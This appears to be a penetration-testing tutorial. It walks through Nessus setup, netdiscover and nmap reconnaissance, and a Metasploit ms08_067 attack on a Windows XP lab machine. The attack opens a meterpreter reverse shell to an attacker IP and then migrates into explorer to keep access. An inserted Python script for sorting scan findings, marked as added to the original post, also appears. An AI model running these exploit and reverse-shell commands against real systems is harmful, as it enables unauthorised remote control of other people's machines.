numberthree
Search Google for "nessus register" and choose www.tenable.com.
Choose the free registration.
Enter your registration data.
Log in to your email and check for your activation code.
Register in the terminal and enter your activation code:
/opt/nessus/sbin/nessuscli fetch --register "code number"
Nessus will then start downloading.

After the download finishes, start Nessus in the terminal:
/etc/init.d/nessusd start
Open Nessus in the web browser.
Sign in to Nessus; Nessus is now ready to use.
Nessus is one of several tools for scanning the vulnerabilities of a system or running application.
The Nessus scanner reports results at 4 levels: critical, medium, low and information.
To get into a system and obtain or use the information in it, you have to exploit the system.
Before you can exploit the system, you must collect data about it. This step is called information gathering. The information that can be found about the system includes the network (IP address), the services or running applications, and the operating system the computer uses.
We can use netdiscover to find the computers connected to us.
netdiscover -i (network interface we use) -r (ip range)
The next step is service enumeration: we need to know which applications, and how many, are running on that system. We can use nmap to get more information about the system, including the running services.

nmap -A (IP)
The third step is vulnerability assessment of the services. Once we know which applications are running, we try to find the vulnerabilities of the system. A vulnerability is the way into the system. We can use Nessus to find and identify the weaknesses of a system.
Open Nessus and sign in.
Type the name and description of your work. Nessus can save your work file, so you can open the file and view it offline.
Then type the target IP.
After you have filled in the blank fields, click save to start scanning the target.
Nessus scans the system for vulnerabilities.
When the scan is over, you can click the result to see the description of each vulnerability by level, starting from critical, then medium and low, and finally the entries that are just information about the system.
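The same ordering by level can be applied to an exported result when deciding what to fix first. The script below is an added example, not part of the original post: it assumes the result was exported as CSV with the columns Plugin ID, Risk, Host, Protocol, Port and Name, and the sample rows, plugin IDs and finding names are constructed placeholders.

```python
import csv
import io
from collections import defaultdict

# Critical first, information last. "High" and "None" are listed because a
# Nessus CSV export may use those labels (assumption, not from the page).
SEVERITY_ORDER = ["Critical", "High", "Medium", "Low", "None"]

# Constructed sample in the assumed export layout; not real scan output.
SAMPLE_EXPORT = """Plugin ID,Risk,Host,Protocol,Port,Name
90001,Critical,192.168.56.101,tcp,445,SMB remote code execution (placeholder)
90002,Medium,192.168.56.101,tcp,445,SMB signing not required (placeholder)
90003,None,192.168.56.101,tcp,0,OS identification (placeholder)
90004,Low,192.168.56.101,tcp,139,NetBIOS information disclosure (placeholder)
90001,Critical,192.168.56.101,tcp,445,SMB remote code execution (placeholder)
"""


def triage(export_text):
    """Return {host: [finding, ...]} sorted by level, duplicate rows removed."""
    per_host = defaultdict(dict)
    for row in csv.DictReader(io.StringIO(export_text)):
        risk = (row.get("Risk") or "").strip()
        if risk not in SEVERITY_ORDER:
            risk = "None"  # unknown or empty labels count as information
        key = (row["Plugin ID"], row["Protocol"], row["Port"])
        per_host[row["Host"]][key] = {
            "risk": risk,
            "service": f'{row["Port"]}/{row["Protocol"]}',
            "plugin": row["Plugin ID"],
            "name": row["Name"],
        }
    rank = SEVERITY_ORDER.index
    return {
        host: sorted(found.values(), key=lambda f: (rank(f["risk"]), f["plugin"]))
        for host, found in per_host.items()
    }


def patch_first(report, levels=("Critical", "High")):
    """Services (host, port/protocol) with at least one finding at these levels."""
    return sorted({(host, f["service"]) for host, fs in report.items()
                   for f in fs if f["risk"] in levels})


if __name__ == "__main__":
    report = triage(SAMPLE_EXPORT)
    for host, findings in report.items():
        print(host)
        for f in findings:
            print(f'  {f["risk"]:<8} {f["service"]:<8} {f["name"]}')
    print("patch first:", patch_first(report))
```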
Now you know the vulnerabilities of the target system. You use that information in the next step, which is the exploit. To exploit the system you can use tools such as Metasploit, Exploit-DB, etc. In this session we practice using Metasploit. Metasploit is a framework that includes applications or modules for exploiting a system.
Enter Metasploit:
type msfconsole and press Enter.
Metasploit has many modules for exploiting a system. Which module to use depends on the information we got in the previous step, the VA step. We use a module that exploits the weakness of our target system.
For example, we will attack Windows XP. In the VA we learned that one of the critical vulnerabilities of Windows XP is in SMB.
So we type
use exploit/windows/smb/ then press Tab twice.
This shows the modules related to what we typed. Choose one of them, e.g.:
use exploit/windows/smb/ms08_067_netapi then press Enter.
We are automatically placed in the netapi module. Run show options, then enter the RHOST value, the IP address of the target:
set RHOST (IP Target)
set RHOST 192.168.56.101
Show the viruses or backdoors that we can use against the system:
show payloads
Choose one of them:
set PAYLOAD windows/meterpreter/reverse_tcp then press Enter.
Run show options, then enter the LHOST value, the IP address that receives the connection:
set LHOST (receiver IP)
set LHOST 192.168.56.1
Type exploit and press Enter. You have now exploited and infiltrated Windows XP.
To view all the commands for controlling Windows XP from the Linux terminal, type help.
The important thing to remember is that the connection we used to get into Windows XP is temporary, so we need to move to another place that stays connected for longer, namely explorer.
Type ps to view the process list.
Find the explorer PID, then migrate to it:
migrate 1684
That's all I can explain to you about hacking Windows XP using Metasploit.

















